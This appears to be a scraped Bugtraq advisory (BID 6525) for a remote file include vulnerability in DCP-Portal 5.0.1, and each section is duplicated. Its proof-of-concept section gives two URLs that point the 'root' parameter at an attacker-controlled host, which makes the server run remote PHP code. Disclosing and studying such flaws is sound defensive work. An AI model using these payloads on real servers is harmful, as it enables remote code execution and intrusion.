DCP-Portal Remote File Include Vulnerability
BID:6525
Info
DCP-Portal Remote File Include Vulnerability
| Bugtraq ID: | 6525 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 06 2003 12:00AM |
| Updated: | Jan 06 2003 12:00AM |
| Credit: | Discovery credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
DCP-Portal DCP-Portal 5.0.1 |
| Not Vulnerable: | |
Discussion
DCP-Portal Remote File Include Vulnerability
DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
Exploit / POC
DCP-Portal Remote File Include Vulnerability
The following proof of concept was provided:
http://www.example.com/library/editor/editor.php?root=http://attacker.org
http://www.example.com/library/lib.php?root=http://attacker.org
The following proof of concept was provided:
http://www.example.com/library/editor/editor.php?root=http://attacker.org
http://www.example.com/library/lib.php?root=http://attacker.org
Solution / Fix
DCP-Portal Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.